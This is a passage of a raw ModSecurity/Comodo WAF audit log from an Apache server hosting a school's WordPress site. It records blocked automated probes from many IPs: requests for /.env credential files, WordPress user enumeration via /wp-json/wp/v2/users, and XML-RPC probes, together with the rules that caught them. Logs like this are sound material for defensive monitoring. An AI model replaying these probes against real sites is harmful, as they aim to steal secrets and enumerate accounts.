"155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746357408407132 1991 (- - -) Stopwatch2: 1746357408407132 1991; combined=1032, p1=348, p2=658, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --217e4a61-Z-- --c0305b0a-A-- [04/May/2025:18:16:53 +0700] aBdMpdsVQyl9V2B8Pt_AdAAAAEU 103.236.140.4 60020 103.236.140.4 8181 --c0305b0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.195.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.195.136 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c0305b0a-C-- demo.sayHello --c0305b0a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c0305b0a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746357413635074 4568 (- - -) Stopwatch2: 1746357413635074 4568; combined=3615, p1=447, p2=2974, p3=22, p4=25, p5=86, sr=88, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0305b0a-Z-- --41397d22-A-- [04/May/2025:18:19:19 +0700] aBdNN9sVQyl9V2B8Pt_AdwAAAE4 103.236.140.4 60034 103.236.140.4 8181 --41397d22-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.166 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --41397d22-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41397d22-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746357559968395 2906 (- - -) Stopwatch2: 1746357559968395 2906; combined=1255, p1=440, p2=784, p3=0, p4=0, p5=30, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41397d22-Z-- --78c9cb3d-A-- [04/May/2025:18:19:19 +0700] aBdNN9sVQyl9V2B8Pt_AeAAAAEk 103.236.140.4 60036 103.236.140.4 8181 --78c9cb3d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.246 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --78c9cb3d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78c9cb3d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746357559973986 2754 (- - -) Stopwatch2: 1746357559973986 2754; combined=1185, p1=403, p2=754, p3=0, p4=0, p5=28, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78c9cb3d-Z-- --c42f6569-A-- [04/May/2025:18:19:25 +0700] aBdNPechPF6irSergtsBywAAANE 103.236.140.4 60042 103.236.140.4 8181 --c42f6569-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.61.166 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.61.166 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c42f6569-C-- demo.sayHello --c42f6569-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c42f6569-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746357565305066 5025 (- - -) Stopwatch2: 1746357565305066 5025; combined=3837, p1=486, p2=3149, p3=25, p4=26, p5=89, sr=90, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c42f6569-Z-- --a3c12c36-A-- [04/May/2025:18:19:25 +0700] aBdNPdsVQyl9V2B8Pt_AegAAAEw 103.236.140.4 60044 103.236.140.4 8181 --a3c12c36-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.246 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a3c12c36-C-- demo.sayHello --a3c12c36-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3c12c36-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746357565963105 4993 (- - -) Stopwatch2: 1746357565963105 4993; combined=3751, p1=456, p2=3091, p3=21, p4=24, p5=93, sr=76, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a3c12c36-Z-- --2093b13e-A-- [04/May/2025:18:41:12 +0700] aBdSWPnZiHJYHUAF8QfkbwAAABI 103.236.140.4 60212 103.236.140.4 8181 --2093b13e-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.99.182.39 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.99.182.39 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --2093b13e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2093b13e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746358872531926 741 (- - -) Stopwatch2: 1746358872531926 741; combined=324, p1=290, p2=0, p3=0, p4=0, p5=34, sr=131, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2093b13e-Z-- --db0a9f0a-A-- [04/May/2025:19:01:17 +0700] aBdXDWJEE9ao5dcyYWn4hAAAAII 103.236.140.4 32922 103.236.140.4 8181 --db0a9f0a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 Nokia6120c/3.70; Profile/MIDP-2.0 Configuration/CLDC-1.1) AppleWebKit/413 (KHTML, like Gecko) Safari/413 Accept-Charset: utf-8 --db0a9f0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --db0a9f0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746360077617269 795 (- - -) Stopwatch2: 1746360077617269 795; combined=325, p1=282, p2=0, p3=0, p4=0, p5=43, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --db0a9f0a-Z-- --c99b045a-A-- [04/May/2025:19:01:20 +0700] aBdXENsVQyl9V2B8Pt_AjAAAAFE 103.236.140.4 32924 103.236.140.4 8181 --c99b045a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.144 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Nokia 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --c99b045a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c99b045a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746360080317129 724 (- - -) Stopwatch2: 1746360080317129 724; combined=313, p1=274, p2=0, p3=0, p4=0, p5=38, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c99b045a-Z-- --36844004-A-- [04/May/2025:19:28:31 +0700] aBddb2JEE9ao5dcyYWn5HQAAAIc 103.236.140.4 36842 103.236.140.4 8181 --36844004-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.60 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --36844004-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36844004-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746361711298885 2608 (- - -) Stopwatch2: 1746361711298885 2608; combined=1398, p1=441, p2=916, p3=0, p4=0, p5=41, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36844004-Z-- --2034dd3d-A-- [04/May/2025:19:28:39 +0700] aBddd_nZiHJYHUAF8QfmDgAAAAg 103.236.140.4 36854 103.236.140.4 8181 --2034dd3d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.60 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.60 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2034dd3d-C-- demo.sayHello --2034dd3d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2034dd3d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746361719372442 5646 (- - -) Stopwatch2: 1746361719372442 5646; combined=4261, p1=506, p2=3533, p3=34, p4=33, p5=91, sr=69, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2034dd3d-Z-- --40441851-A-- [04/May/2025:19:42:10 +0700] aBdgotsVQyl9V2B8Pt_BtQAAAEM 103.236.140.4 37136 103.236.140.4 8181 --40441851-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.16 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.16 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --40441851-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40441851-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746362530044843 790 (- - -) Stopwatch2: 1746362530044843 790; combined=326, p1=283, p2=0, p3=0, p4=0, p5=43, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40441851-Z-- --d6454c5b-A-- [04/May/2025:19:42:16 +0700] aBdgqGJEE9ao5dcyYWn5ZAAAAIk 103.236.140.4 37182 103.236.140.4 8181 --d6454c5b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.134.16 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.134.16 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --d6454c5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6454c5b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746362536597083 705 (- - -) Stopwatch2: 1746362536597083 705; combined=314, p1=275, p2=0, p3=0, p4=0, p5=38, sr=85, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6454c5b-Z-- --6ac43226-A-- [04/May/2025:20:50:40 +0700] aBdwsOchPF6irSergtsEnAAAANE 103.236.140.4 37942 103.236.140.4 8181 --6ac43226-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.76 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.76 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept-Charset: utf-8 --6ac43226-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ac43226-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746366640773264 854 (- - -) Stopwatch2: 1746366640773264 854; combined=332, p1=290, p2=0, p3=0, p4=0, p5=42, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ac43226-Z-- --66ac8234-A-- [04/May/2025:20:51:16 +0700] aBdw1GJEE9ao5dcyYWn5kwAAAIk 103.236.140.4 37944 103.236.140.4 8181 --66ac8234-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 195.211.191.170 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 195.211.191.170 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Redmi 6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Mobile Safari/537.36 Accept-Charset: utf-8 --66ac8234-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66ac8234-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746366676637580 845 (- - -) Stopwatch2: 1746366676637580 845; combined=333, p1=297, p2=0, p3=0, p4=0, p5=36, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66ac8234-Z-- --3b9d8777-A-- [04/May/2025:20:54:51 +0700] aBdxq-chPF6irSergtsEnQAAANI 103.236.140.4 37952 103.236.140.4 8181 --3b9d8777-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.87 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Mi Note 3 Build/OPM1.171019.019; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044813 Mobile Safari/537.36 MMWEBID/6858 MicroMessenger/7.0.5.1440(0x27000537) Process/tools NetType/4G Language/zh_CN Accept-Charset: utf-8 --3b9d8777-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b9d8777-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746366891392667 839 (- - -) Stopwatch2: 1746366891392667 839; combined=335, p1=291, p2=0, p3=0, p4=0, p5=44, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b9d8777-Z-- --091b2649-A-- [04/May/2025:21:00:31 +0700] aBdy__nZiHJYHUAF8QfmWQAAABA 103.236.140.4 38030 103.236.140.4 8181 --091b2649-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 157.245.36.108 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 157.245.36.108 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --091b2649-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --091b2649-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746367231396255 760 (- - -) Stopwatch2: 1746367231396255 760; combined=300, p1=274, p2=0, p3=0, p4=0, p5=26, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --091b2649-Z-- --27e7cc7d-A-- [04/May/2025:21:10:46 +0700] aBd1ZvnZiHJYHUAF8QfmcAAAAAg 103.236.140.4 38142 103.236.140.4 8181 --27e7cc7d-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 139.59.132.8 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 139.59.132.8 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --27e7cc7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27e7cc7d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746367846317398 875 (- - -) Stopwatch2: 1746367846317398 875; combined=317, p1=276, p2=0, p3=0, p4=0, p5=41, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --27e7cc7d-Z-- --5620925d-A-- [04/May/2025:21:11:15 +0700] aBd1g2JEE9ao5dcyYWn5mQAAAJM 103.236.140.4 38200 103.236.140.4 8181 --5620925d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5620925d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5620925d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746367875553872 3215 (- - -) Stopwatch2: 1746367875553872 3215; combined=1406, p1=541, p2=831, p3=0, p4=0, p5=34, sr=174, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); 